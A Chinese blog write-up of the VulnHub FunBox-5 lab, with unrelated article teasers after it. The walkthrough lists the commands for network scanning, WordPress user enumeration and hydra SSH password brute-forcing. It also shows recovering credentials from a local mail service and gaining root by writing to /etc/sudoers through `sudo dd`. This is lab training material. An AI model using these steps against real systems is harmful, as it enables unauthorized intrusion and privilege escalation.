vulnhub靶场之FunBox-5

一.环境搭建

1.靶场描述

Lets separate the script-kids from script-teenies.

Hint: The first impression is not always the right one!

If you need hints, call me on twitter: @0815R2d2 Have fun...

This works better with VirtualBox rather than VMware

This works better with VirtualBox rather than VMware.

2.靶场下载

https://www.vulnhub.com/entry/funbox-next-level,547/

image-20240505210150176

3.靶场启动

image-20240505210220611

二.信息收集

1.探测IP地址

nmap -sP 192.168.2.0/24

image-20240505210631152

arp-scan -l

image-20240505210650840

我们探测出来IP地址为192.168.2.8

2.探测端口及服务

nmap -p- -sV 192.168.2.8

image-20240505211214614

开启了80端口,服务为Apache2
开启了22端口,服务为ssh

通过端口我们可以知道,又是ssh登录

三.渗透测试

1.访问web服务

http://192.168.2.8

image-20240505211508157

可以看到是一个apache2页面

2.扫描web服务

1)nikto扫描网站结构

nikto -h http://192.168.2.8

image-20240505211735325

扫描到一个robots.txt敏感目录

2)dirsearch扫描

这里IP地址变为192.168.2.9
dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent

image-20240505212342222

扫描出来一个http://192.168.2.9/drupal

3)dirb扫描

dirb http://192.168.2.9

image-20240505212903776

3.渗透测试

1)访问robots.txt

http://192.168.2.9/robots.txt

image-20240505213108046

http://192.168.2.9/Thinking

image-20240505213143759

没有任何有用的信息

2)访问drupal目录

http://192.168.2.9/drupal

image-20240505213436812

我们发现重定向了192.168.178.33,没有什么用,我们进行扫描drupal试试

image-20240505214734508

我们可以看到cms是wordpress,那么我们使用wpscan进行爆破,因为开启了22端口,我们可以进行ssh登录

3)wpscan爆破

wpscan –url http://192.168.2.9/drupal/index.php –wp-content-dir=http://192.168.2.8/drupal/wp-content/ -e

image-20240505215430043

我们可以看到爆破出来2个用户名,一个是admin,一个是ben

4)hydra爆破

hydra -l admin -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215553186

我们可以看到爆破不出来,那么我们爆破另一个

hydra -l ben -P  /usr/share/wordlists/rockyou.txt  ssh://192.168.2.9

image-20240505215603591

爆破出来密码是pookie

5)ssh登录

ssh ben@192.168.2.9

image-20240505215848216

我们可以看到登录成功

我们在根目录下可以看到mail目录,但是里面的文件我们没有权限查看

image-20240505220022514

image-20240505221052245

提权也提权不了,我们换一个思路

6)邮件服务

发现 ben 用户在 mail 组中 会不会有邮件发服务呢 netstart -anpt

image-20240505220408960

我们可以看到110端口是开放的吗,我们使用110端口进行查看

现存在邮件服务 通过110端口 连接本地 telnet 127.0.0.1 110发现可以, 而且有三封信 发现账号密码:adam/qwedsayxc!

image-20240505220805479

image-20240505220859984

image-20240505220915396

我们使用adam进行登录

ssh adam@192.168.2.9

image-20240505221713112

我们可以看到登录成功

7)提权

切换用户查看权限 id发现在sudo组 查看sudo -l发现了dd,de,df都可以sudo提权 只有dd可以使用

image-20240505221921830

提权方法查询网站:GTFOBins

image-20240505221959108

该命令可以写入具有root权限的文件,执行命令进行写入文件/etc/sudoers,设置adam用户具有全部的特权命令

LFILE=/etc/sudoers
echo "adam    ALL=(ALL:ALL) ALL" | sudo dd of=$LFILE

image-20240505222138478

可以使用find命令进行提权,提权成功

image-20240505222232759

获取flag

image-20240505222354615

至此获取到了所有得flag,渗透测试结束。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/615365.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

39-5 入侵检测系统(IDS)- 安装配置IDS(注意我没安装成功,阅读需谨慎)

39-5 入侵检测系统(IDS)- 安装配置IDS(注意我没安装成功,阅读需谨慎)

官网:Snort Rules and IDS Software Download 参考: (这位大佬分享了安装包下载链接):https://www.cnblogs.com/taoyuanming/p/12722263.html (安装过程参考这位大佬):Snort 安装与配置(CentOS 7)_centos 7 snort-CSDN博客一、安装 IDS(我这里在 CentOS 7 虚拟机中安…
阅读更多...
QT学习(1)——创建第一个QT程序,信号和槽,打开关闭窗口的案例

QT学习(1)——创建第一个QT程序,信号和槽,打开关闭窗口的案例

目录 引出规范和帮助文档创建第一个Qt程序对象树概念信号signal槽slot自定义信号和槽1.自定义信号2.自定义槽3.建立连接4.进行触发 自定义信号重载带参数的按钮触发信号触发信号拓展 lambda表达式返回值mutable修饰案例 打开关闭窗口案例 总结 引出 QT学习(1&#…
阅读更多...
5个巨好用的论文查重降重/aigc降重网站!

5个巨好用的论文查重降重/aigc降重网站!

给大家分享5个巨好用的论文查重降重,aigc降重网站! 1、checkbug↙:每天免费查重一次!用超级降重改全文,ai在线改写段落,智能查降查本系统一遍过稿,有套餐!支持aigc降低!…
阅读更多...
精密机械设备运用弧形导轨中如何保持高精度?

精密机械设备运用弧形导轨中如何保持高精度?

导轨精度标准是对导轨的精度统一规定,无论是滑移运动、滑块运动还是旋转运动,都有一定的精度规格。而导轨精度标准是为了保证导轨运动时的精确度而设定的精度标准,它是规定各种导轨的精度统一标准,是机械设备的运动精度基础和保障…
阅读更多...
履带车配置 一些小细节

履带车配置 一些小细节

履带车配置 一些小细节 485/CAN模式 自动识别上电后第一帧是485还是CAN指令,就进入对应通讯模式用485通讯这个驱动器通讯可以了,你再接CAN通讯,这个驱动器必须断电重启一下;不能在通电模式下切换 驱动器拨码开关 两个驱动器的…
阅读更多...
家电无缝连接的奥秘—通过酷开系统实现智能家居互联互通

家电无缝连接的奥秘—通过酷开系统实现智能家居互联互通

智能家居是消费升级与技术升级的共同产物,是时代发展的必然结果,日渐深入人心也是大势所趋。酷开科技智慧AI,让智慧家居成为生活中的一部分,以酷开系统为中心,实现家庭内智能家居的连接,并可通过酷开系统进…
阅读更多...
抽空学学go

抽空学学go

2024年5月9日11:14:24 学习go 看课8小时转职Golang工程师(如果你想低成本学习Go语言)_哔哩哔哩_bilibili 文档[8小时转职Golang工程师 (yuque.com)]( 1.安装go 2024年5月9日11:27:16 2.安装 vscode go配置环境 vs code配置go开发环境 (zhihu.com) vscode里面配置代理&…
阅读更多...
windows设置软件开机自启动

windows设置软件开机自启动

winr 输入 shell:startup C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup把要开机自动启动的程序的快捷方式放进来 输入快捷键 ctrlshiftesc 打开任务管理器 同时在任务管理器也可以看到
阅读更多...
2.前端路由的配置和使用

2.前端路由的配置和使用

一,路由的作用 路由的作用就是将页面文件跟URL地址形成对应匹配 二,如何安装路由 这里我们采用pnpm的方式在项目中执行 pnpm install vue-routernext --save三,路由如何使用 首先创建一个我们需要访问的页面文件,这里我先创建…
阅读更多...
程序员的归宿。。

程序员的归宿。。

大家好,我是瑶琴呀。 相信每个进入职场的人都考虑过自己的职业生涯规划,在不同的年龄段可能面临不同挑战,这点对于 35 的人应该更为感同身受。 对于程序员来说,大部分人的职业道路主要是下面三种:第一条,…
阅读更多...
【自动驾驶|毫米波雷达】逻辑化讲解测角全流程

【自动驾驶|毫米波雷达】逻辑化讲解测角全流程

第一次更新:2024/5/7 目录 一. 引入 基础概念 二. 测角原理 1. 接收天线不同位置 2. 角度几何关系 3. 角度正负规定 4. 角度测量 5. 最大不模糊角 三. 角度分辨率 1. 相位变化量 2. 角度表示 3. 角度变化量 三. 测角算法 1. 三维快速傅里叶变换 (3D-FFT&…
阅读更多...
maven远程仓库访问顺序

maven远程仓库访问顺序

首先需要了解一下各个配置文件,主要分为三类: 全局配置文件(${maven.home}/conf/settings.xml),maven安装路径下的/conf/settings.xml用户配置文件(%USER_HOME%/.m2/settings.xml),windows用户文件夹下项目配置文件:p…
阅读更多...
汽车EDI:安通林Antolin EDI 项目案例

汽车EDI:安通林Antolin EDI 项目案例

安通林(Antolin)是一家全球性的汽车零部件制造商,专注于汽车内饰系统和零部件的生产,致力于创新和采用先进的技术。近年来 安通林Antolin 推动其供应商部署EDI系统,使得双方能够通过EDI传输业务单据,极大提…
阅读更多...
制造业如何选择合适的项目管理软件?(内含软件推荐)

制造业如何选择合适的项目管理软件?(内含软件推荐)

近期,收到很多小伙伴的提问:“想了解制造行业如何选择到合适的项目管理软件?”在竞争激烈的市场环境中,有效的项目管理对于制造业的发展至关重要,而项目管理软件则是重要支撑,能帮助企业更好地规划和跟踪项…
阅读更多...
OpenAI推动人工智能商业化:萨姆·奥尔特曼的《星门计划》

OpenAI推动人工智能商业化:萨姆·奥尔特曼的《星门计划》

Sam Altman最近在斯坦福大学做了一次采访,这实际上是迄今为止最具洞察力的采访之一,我将深入探讨他说的几件事,并解释为什么它们实际上是如此具有洞察力,因为这确实是一次非凡的采访,所以,不再浪费时间&…
阅读更多...
CSS 网格布局一行X个排列

CSS 网格布局一行X个排列

<div class"icon-box"><divv-for"(item,index) in icon" :key"index" class"icon"style"cursor: pointer">{{item}}</div></div>.icon-box{display: grid; /**网格布局*/grid-template-columns: r…
阅读更多...
烽火三十六技丨网络资产安全治理平台新版本发布,一文看懂四大核心优势

烽火三十六技丨网络资产安全治理平台新版本发布,一文看懂四大核心优势

云计算、移动互联网、物联网等技术飞速发展&#xff0c;网络环境愈发开放互联&#xff0c;原有的资产管理方式已难以适应当下的变化。同时&#xff0c;网络资产需求的突发性和人为疏忽&#xff0c;也时常导致资产数量不明、类型模糊、安全漏洞检查不全面等问题。因此&#xff0…
阅读更多...
鸿蒙ArkUI:【编程范式:命令式->声明式】

鸿蒙ArkUI:【编程范式:命令式->声明式】

命令式 简单讲就是需要开发用代码一步一步进行布局&#xff0c;这个过程需要开发全程参与。 开发前请熟悉鸿蒙开发指导文档&#xff1a;gitee.com/li-shizhen-skin/harmony-os/blob/master/README.md点击或者复制转到。 Objective-C ObjectiveC 复制代码 UIView *cardView …
阅读更多...
SNMPv3-原理浅谈+报文示例+简易配置

SNMPv3-原理浅谈+报文示例+简易配置

个人认为&#xff0c;理解报文就理解了协议。通过报文中的字段可以理解协议在交互过程中相关传递的信息&#xff0c;更加便于理解协议。 因此本文将在 SNMPv3 协议报文的基础上进行介绍。 SNMPv3 相关 RFC 文档。 关于 SNMPv3 的基本内容介绍&#xff0c;可参考RFC3410-Intro…
阅读更多...
SQL分库分表

SQL分库分表

一、介绍 问题分析 随着互联网及移动互联网的发展&#xff0c;应用系统的数据量也是成指数式增长&#xff0c;若采用单数据库进行数据存储&#xff0c;存在以下性能瓶颈: 1. IO瓶颈:热点数据太多&#xff0c;数据库缓存不足&#xff0c;产生大量磁盘IO&#xff0c;效率较低。…
阅读更多...
最新文章

Copyright @ 2022~2023